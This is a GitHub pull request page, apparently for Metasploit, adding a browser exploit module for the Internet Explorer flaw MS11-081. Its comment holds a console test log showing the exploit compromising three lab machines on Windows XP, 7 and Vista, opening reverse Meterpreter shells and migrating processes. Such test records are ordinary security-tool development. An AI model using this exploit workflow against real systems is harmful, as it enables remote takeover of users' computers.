Add MS11-081 #1279
Merged
Add MS11-081 #1279
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Tested was successfull: msf > use exploit/windows/browser/ms11_081_option msf exploit(ms11_081_option) > rexploit [*] Reloading module... [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.128:4444 [*] Using URL: http://0.0.0.0:8080/AzP3lQnX4US6Ru [*] Local IP: http://192.168.1.128:8080/AzP3lQnX4US6Ru [*] Server started. msf exploit(ms11_081_option) > [*] 192.168.1.142 ms11_081_option - Requesting: /AzP3lQnX4US6Ru [*] 192.168.1.142 ms11_081_option - Target selected as: IE 8 on Windows XP SP3 [*] 192.168.1.142 ms11_081_option - Using msvcrt ROP [*] 192.168.1.142 ms11_081_option - Sending HTML... [*] Sending stage (752128 bytes) to 192.168.1.142 [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.142:4075) at 2013-01-09 23:25:30 +0100 [*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.142:4075) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3584) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2236 [+] Successfully migrated to process [*] 192.168.1.142 - Meterpreter session 1 closed. Reason: Died [*] 192.168.1.137 ms11_081_option - Requesting: /AzP3lQnX4US6Ru [*] 192.168.1.137 ms11_081_option - Target selected as: IE 8 on Windows 7 [*] 192.168.1.137 ms11_081_option - Using JRE ROP [*] 192.168.1.137 ms11_081_option - Sending HTML... [*] Sending stage (752128 bytes) to 192.168.1.137 [*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.137:49574) at 2013-01-09 23:27:24 +0100 [*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.137:49574) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2796) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2816 [+] Successfully migrated to process [*] 192.168.1.137 - Meterpreter session 2 closed. Reason: Died [*] 192.168.1.131 ms11_081_option - Requesting: /AzP3lQnX4US6Ru [*] 192.168.1.131 ms11_081_option - Target selected as: IE 8 on Windows Vista [*] 192.168.1.131 ms11_081_option - Using JRE ROP [*] 192.168.1.131 ms11_081_option - Sending HTML... [*] Sending stage (752128 bytes) to 192.168.1.131 [*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.131:49393) at 2013-01-09 23:28:42 +0100 [*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.131:49393) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3632) [*] Spawning notepad.exe process to migrate to [+] Migrating to 336 [+] Successfully migrated to process [*] 192.168.1.131 - Meterpreter session 3 closed. Reason: Died merging! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Ivan Fratric's CVE-2011-1996. Demo: